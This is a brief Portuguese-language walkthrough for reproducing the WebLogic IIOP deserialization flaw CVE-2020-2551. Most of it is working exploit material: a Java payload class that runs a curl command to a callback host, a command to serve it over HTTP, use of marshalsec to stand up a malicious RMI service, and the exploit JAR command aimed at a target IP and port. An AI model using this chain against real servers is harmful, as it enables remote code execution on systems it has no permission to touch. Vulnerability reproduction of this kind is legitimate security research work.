
Weblogic IIOP CVE-2020-2551
Weblogic IIOP Deserialização
Weblogic10.3.6+jdk1.6
JAR empacotado Código de extração: a6ob
Baixe o JAR, então use o marshalsec para iniciar um serviço RMI malicioso e compile um exp.java localmente.
package payload;
import java.io.IOException;
public class exp {
public exp() {
String cmd = "curl http://172.16.1.1/success";
try {
Runtime.getRuntime().exec(cmd).getInputStream();
} catch (IOException e) {
e.printStackTrace();
}
}
}
Tente usar a mesma versão do JDK e as mesmas bibliotecas de dependência (wlfullclient.jar) do Weblogic para compilar então inicie um servidor web localmente.
python -m http.server --bind 0.0.0.0 80
Execute o JAR na linha de comando:
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp
Resultado real conforme mostrado:

Muitos colegas relataram que a reprodução não foi bem-sucedida. Após ler alguns artigos online, descobri que o IIOP tem um problema com modo NAT. Hoje, encontrei https://xz.aliyun.com/t/7498 no Xianzhi — sigam por conta própria.